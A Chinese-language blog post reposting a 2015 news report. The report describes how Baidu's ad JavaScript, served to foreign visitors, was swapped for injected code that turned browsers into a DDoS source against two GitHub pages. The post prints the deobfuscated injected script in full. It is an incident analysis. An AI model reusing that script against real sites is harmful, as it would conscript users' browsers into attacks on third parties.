關於新浪博客瀏覽出現的奇特狀況，我在解決問題的時候，搜索到這篇文章，和我點擊瀏覽新浪博客首頁任意博文出現的狀況一摸一樣。給新浪博客客服聯繫，都裝聾作啞，沒任何回復。

這是我瀏覽新浪博客時出現的狀況，就照了下來。

message from webpage
WARNING:malicious javascript detected on this domain

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    26日9時（Pacific Daylight Time，北京時間27日12時）左右開始，從境外訪問v.baidu.com的時候發現會出現Javascript alert出現的彈窗：

WARNING: malicious javascript detected on this domain 追查了一下發現是百度廣告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
在境外訪問時被替換成一段特殊的js。詳細請求和返回的js見：http://pastie.org/10056531

反編譯後代碼大致如下：
"document.write(" src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>x3c/script>");!window.jQuery&&document.write(" src='http://code.jquery.com/jquery-latest.js'>x3c/script>");startime=(new
Date).getTime();var count=0;function unixtime(){var a=new Date;return
Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire/","https://github.com/cn-nytimes/"];NUM=url_array.length;function
r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
Date).getTime()},complete:function(){responseTime=(new
Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"

很明顯看出兩個攻擊目標： https://github.com/greatfire/ 和 https://github.com/cn-nytimes/

大致的流程就是：

1. GFW把某些常見網站的JS替換成以上js

2. 全球各地訪問國內網站時，相當於成為DoS的源（可能還有全國各地訪問國外時，未經確認）

3. GitHub不堪重負，把 https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 的返回改成一個alert: WARNING: malicious
javascript detected on this domain （網站存在惡意JS代碼調用）

當境外用戶訪問內置境內一些網站如百度的JS調用的網站時，中國的國家防火牆GFW將這部分調用替換成重定向至目標網站，以調用民用流量的方式，實現對目標網站的DDOS攻擊。中國網絡審查監測機構Greatfire和紐約時報中文網目前尚未就此作出回應。 [博訊首發,轉載請註明出處]- 支持此文作者/記者()
4941430       

http://www.boxun.com/news/gb/china/2015/03/201503271431.shtml#.VRsCJkDD_IU